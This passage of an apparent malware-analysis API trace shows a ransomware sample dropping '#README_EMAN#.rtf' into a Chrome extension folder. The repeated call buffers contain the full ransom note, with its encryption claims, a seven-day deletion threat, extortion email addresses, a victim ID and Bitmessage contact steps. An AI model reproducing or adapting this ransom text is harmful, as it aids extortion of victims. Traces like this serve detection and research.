data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\#readme_eman#.rtf")) returned 0xffffffff [0272.357] GetLastError () returned 0x2 [0272.357] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0272.358] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.358] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.358] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 